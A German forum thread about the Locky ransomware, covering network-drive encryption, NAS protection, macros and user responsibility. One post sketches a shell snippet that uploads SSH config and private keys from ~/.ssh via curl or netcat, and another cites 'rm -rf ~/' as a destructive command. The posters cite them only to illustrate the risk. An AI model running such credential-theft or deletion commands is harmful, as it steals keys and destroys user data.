News Krypto-Trojaner: Locky weiterhin auf dem Vormarsch

Ich hätte da ein, zwei Fragen:
Kann Locky auch Netzwerkfreigaben sowie Gemountete Netzlkaufwerke verschlüsseln? Wie kann ich mein NAS schützen? Über ein VirtualMachine mounten und auf Netzwerk zugreifen?
Ist Linux betroffen?
 
sheng schrieb:
Ich hätte da ein, zwei Fragen:
Kann Locky auch Netzwerkfreigaben sowie Gemountete Netzlkaufwerke verschlüsseln? Wie kann ich mein NAS schützen? Über ein VirtualMachine mounten und auf Netzwerk zugreifen?
Ist Linux betroffen?
Soweit ich weiß verschlüsselt er alles was er findet und auf was er/der angemeldete User schreibzugriff hat. Wenn er einmal angefangen hat gibts glaube ich nicht viel was man noch machen kann, ausser stecker ziehen. Erhlich gesagt hab ich aber auch keine Ahnung wie lange er für das Verschlüsseln braucht.
 
sheng schrieb:
Kann Locky auch Netzwerkfreigaben sowie Gemountete Netzlkaufwerke verschlüsseln?
auf alle fälle können gemountete Laufwerke verschlüsselt werden.
Bei Freigaben gibt es bisher unterschiedliche aussagen, soll wohl aber auch schon vorgekommen sein.

Schützen kannst du dich mit Backups (die eben nicht verbunden sind).
Ansonsten eben sehr kritisch bei E-Mail Anhängen sein und im Browser eventuell JavaScript deaktivieren (zb mit NoScript).
Natürlich sollten Browser inklusive Add-Ons, Betriebssystem und Virenschutz immer auf dem neusten Stand
 
sheng schrieb:
Ich hätte da ein, zwei Fragen:
Kann Locky auch Netzwerkfreigaben sowie Gemountete Netzlkaufwerke verschlüsseln? Wie kann ich mein NAS schützen? Über ein VirtualMachine mounten und auf Netzwerk zugreifen?
Ist Linux betroffen?

- So viel ich gehört hab, kann es auch Netzlaufwerke verschlüsseln.
- Trenn dein NAS vom PC mit Internetzugang und mach ein zweites Netzwerk ohne Internet auf, an welches du einen PC dran hängst bei dem die Kommunikation nur über USB-Stick läuft. So solltest du eine gesteigerte Sicherheit haben - ist aber nicht die perfekte Sicherheit und ziemlich umständlich. Du könntest auch ein Backup vom NAS machen, so dass es egal ist, sollte es mal verschlüsselt werden.
- Wie schon geschrieben wurde, kommt es auf die Freigaben auf das Dateisystem des Hosts an.

Edit I:
Cr4y schrieb:
Erhlich gesagt hab ich aber auch keine Ahnung wie lange er für das Verschlüsseln braucht.

Das kommt auf den Algorithmus und die Datenmenge an.
Man könnte es theoretisch mal auf einem Testrechner testen. Bis jetzt hatte ich aber noch keine Begegnung mit dem Ding - ich lösch alle Mails die ich nicht erwarte.

Edit II:
Frage von mir:
Kann etwas passieren, wenn ich meine Mails erstmal über den Browser bearbeite (lösche) - natürlich ohne dass ich eine Mail öffne oder gar einen Anhang öffne?
 
Zuletzt bearbeitet:
Crazy_Bon schrieb:
Ist denn nicht das eigentliche Problem eher der Computernutzer, der bedenkenlos irgendeine angehängte Datei aus einer Email ausführt?
Jep. Wenn der Nutzer jede aufploppende Meldung einfach so abnickt, hat er selbst Pech. Mir ist nicht bekannt, dass irgendeine Variante irgendwelche Exploits ausnutzt.
Mithos schrieb:
Im Fernsehen wurde von einem Restaurant Besitzer berichtet, der übers Arbeitsamt einen neuen Koch suchte. Eine Bewerbungsmail ging bei ihm ein, die im perfekten deutsch an ihn persönlich addressiert war. Inhalt der Mail war auch dementsprechend gestaltet mit Angaben zu Qualifikationen,....
Im Anhang sollte er dann den Lebenslauf etc. entnehmen und hat sich damit infiziert.
Und damit nur die halbe Wahrheit. Verschwiegen wurde hierbei, dass er wahrscheinlich Makros aktiviert hat und sich somit das Zeug eingefangen hat. Vom reinen Betrachten von Dokumenten, fängt man sich nichts ein, außer es werden Exploits benutzt, wovon mir keiner bekannt ist.
Mithos schrieb:
Das hat nichts mit den einfachen Mails im gebrochenen Englisch zu tun, die man sonst so sieht.
Aber mit der Blauäugigkeit des Anwenders. "Och das Dokument hat Makros, aktivieren wir sie doch mal".

https://www.youtube.com/watch?v=IfXMN3VhikA
 
Geht das schonwieder los nur weil man kein it Spezialist ist heißt das noch lange nicht das man selbst schuld ist , schuld sind immer die die sowas rausbringen ,

Kein Mensch wirklich keiner ist auf jedem Gebiet der absolute Pro jeder hat Schwächen und trotzdem bewegt er sich auf dem Gebiet ... Immer über das elend anderer lachen ist auch kein feiner Zug
 
Yuuri schrieb:
Jep. Wenn der Nutzer jede aufploppende Meldung einfach so abnickt, hat er selbst Pech. Mir ist nicht bekannt, dass irgendeine Variante irgendwelche Exploits ausnutzt.
Das Problem ist nur, daß fast jede "seriöse" kommerzielle Seite mittlerweile ebenso arbeitet. Viele sind ohne aktives JavaSkript nicht nutzbar, immer öfter ploppt irgendein Mist auf, Aufforderungen, den Adblocker abzuschalten oder die laut EU-Recht unvermeidliche Cookie-Warnung, schließlich wollen manche Popup-Seiten per "ok" geschlossen werden.... Viele Seiten - taz.de zB., poppen beim Besuch so eine Bettel-Meldung auf "Guter Jopurnalismus ist nicht umsonst" etc. ohne Schließ-Kreuz...

In all dem Mist fallen echte Schädlinge gar nicht mehr auf.
 
@scryed
Selbst den Spezialisten passiert es! Es braucht sich keiner rausreden.
Ich merke es schon bei mir selbst, dass ich aus Unachtsamkeit, oder weil ich gerade mit den Gedanken wo anders bin ...
 
Yuuri schrieb:
Und damit nur die halbe Wahrheit. Verschwiegen wurde hierbei, dass er wahrscheinlich Makros aktiviert hat
Es wurde noch gesagt, dass es eine ZIP Datei war, vermutlich lags daran.
Der "Bewerber" hat gesagt, dass es mit PDF Probleme gibt und er deshalb eine ZIP schickt. Klar, im Nachhinein sieht man seinen Fehler, aber ich würde ihm da nichts vorwerfen. Ich verschicke auch dauernd Anhänge per ZIP/RAR.

Wenns darüber hinaus noch was gegeben hat, weiß ich davon jedoch nichts.
 
Kein Mensch wirklich keiner ist auf jedem Gebiet der absolute Pro jeder hat Schwächen und trotzdem bewegt er sich auf dem Gebiet ... Immer über das elend anderer lachen ist auch kein feiner Zug
Es macht sich niemand lustig. Aber wenn man ein unsicheres Betriebssystem verwendet (Windows) muss man einfach ein grundlegendes Wissen haben. Bzw. sollte man das, egal was man verwendet. Dazu gehört, dass man nicht einfach Makros in Word aktiviert, dass Javascript Dateien keine Kundenbriefe sind und dass man nicht einfach alles abnicken darf.
Die Leute gehen ja auch nicht zur erstbesten Bank, oder schließen wahllos Versicherungen und Verträge ab (die meisten zumindest..). Nur wenns um PCs geht meint jeder dass Unwissenheit vollkommen in Ordnung ist.
Was nicht bedeutet das man nicht trotzdem Opfer einer Ransom-Malware werden kann. Niemand ist perfekt. Aber leider zeigen 99% der Leute 0 Interesse. Sowohl beruflich als auch privat.
 
Zuletzt bearbeitet:
spamarama schrieb:
Aber wenn man ein unsicheres Betriebssystem verwendet (Windows) muss man einfach ein grundlegendes Wissen haben.
Schlimmer als die Naivität oder Unachtsamkeit der Betroffenen sind solche dummen Aussagen. :freak: Und morgen kommt einer für das "sichere" Linux heraus. Das Ding wird vom User ausgeführt und es verschlüsselt alles, auf was der User Zugriff besitzt. Ein rm -rf ~/ macht exakt das Gleiche wie rmdir /S /Q %USERPROFILE% (nicht, dass es jetzt jemand ausführen sollte).
 
Scryed, jup. Absolut.

Meistens betrifft es die omas und opas oder eben nicht technikaffine user.

Weil sie keine Beziehung mit dem PC führen und alles was nicht per plug and play funzt wird sofort als defekt eingestuft. Das Wissen fällt hier!

Locky macht umso mehr, zum jetzigen Zeitpunkt, die mac osx systeme für viele wieder attraktiv.
 
もしもし schrieb:
Locky macht umso mehr, zum jetzigen Zeitpunkt, die mac osx systeme für viele wieder attraktiv.
Naja, wie Yuuri schon angemerkt hat, schützt ein Betriebssystem nicht vor Unwissenheit oder Blödheit.

Wenn ich hier im Linux-Forum ein ganz tolles Shellscript poste, das ganz mal eben so nebenbei
Code:
UPLOAD_CMD = ... # curl, netcat, irgendwas wird sich wohl finden
$UPLOAD_CMD /etc/ssh/ssh_config
find ~/.ssh -type f -exec $UPLOAD_CMD {} \;

ausführt... natürlich fällt das früher oder später auf, aber besteht nicht die Chance, dass selbst ein halbwegs erfahrener Linux-User mal nen geistigen Aussetzer hat? Und schon hab ich nen Haufen schöner RSA Private Keys und kann mit etwas Glück nen Server stehlen, wenn die Schlüssel nicht passwortgeschützt sind.
 
Zuletzt bearbeitet:
Braucht der Virus spezielle Rechte oder läuft dieser bereits unter einer normalen Standardbenutzerumgebung?
 
Braucht keine speziellen Rechte.
Unter Windows darf ja prinzipiell jeder Prozess in nahezu allen Ordnern alles mit den Dateien machen, was er will. Eine Schwachstelle an sich.

Wieso regelt man es nicht z.B. so, daß jedes Programm nur noch im eigenen Ordner Schreib- und Lese-Rechte hat?
Ist eh ne Unart, daß manche Programme meinen, ihre Daten an 5 verschiedenen Orten ablegen zu müssen, die man sich als Nutzer dann alle mühselig zusammen suchen darf, wenn man mal nen Backup machen oder seine Settings übernehmen möchte.
 
Dann könntest du keine Dateien mehr in andere Ordner speichern oder aus ihnen öffnen.
Wobei das in Kombination mit einer kurzen Bestätigung, sobald man gegen die Regel verstoßen möchte, durchaus nicht übel klingt.
 
UltraWurst schrieb:
Braucht keine speziellen Rechte.
Unter Windows darf ja prinzipiell jeder Prozess in nahezu allen Ordnern alles mit den Dateien machen, was er will. Eine Schwachstelle an sich.
https://www.youtube.com/watch?v=5AhzLV4-i8k . Du hast auf dein Profil Zugriff (das wird auch als erstes vn Locky beackert, auf %temp% und in all users, documents . Mehr nicht.
Wieso regelt man es nicht z.B. so, daß jedes Programm nur noch im eigenen Ordner Schreib- und Lese-Rechte hat?
Ist eh ne Unart, daß manche Programme meinen, ihre Daten an 5 verschiedenen Orten ablegen zu müssen, die man sich als Nutzer dann alle mühselig zusammen suchen darf, wenn man mal nen Backup machen oder seine Settings übernehmen möchte.
Wenn das Programm nicht gerade aus dem vorigen Jahrtausend stammt, schreibt Windows vor die Daten im Userprofil unter %appdata% zu speichern. Daran halten sich eigentlich fast alle Programme.
 
KlaasKersting schrieb:
Wobei das in Kombination mit einer kurzen Bestätigung, sobald man gegen die Regel verstoßen möchte, durchaus nicht übel klingt.
Wobei das bei "Profis" sowieso deaktiviert werden würde, wenn die UAC bereits "nervt".
 
Sowie als auch. Ihr habt da beide nicht so Unrecht.

Eine Viren Infektion (aktuell) fängt im %temp folder an und nistet sich dann in appdata oder geht in den windows folder rüber.
Außer bei einer script injection, die geht in die registry.

So viele Möglichkeiten gibt es da nicht wirklich
Und der beste Schutz ist kein anti viren programm, die signaturen sind meist veraltet,
die bieten keinen wirklichen Schutz gegen 0day exploits aber eine gute präventive.
 
Zurück
Oben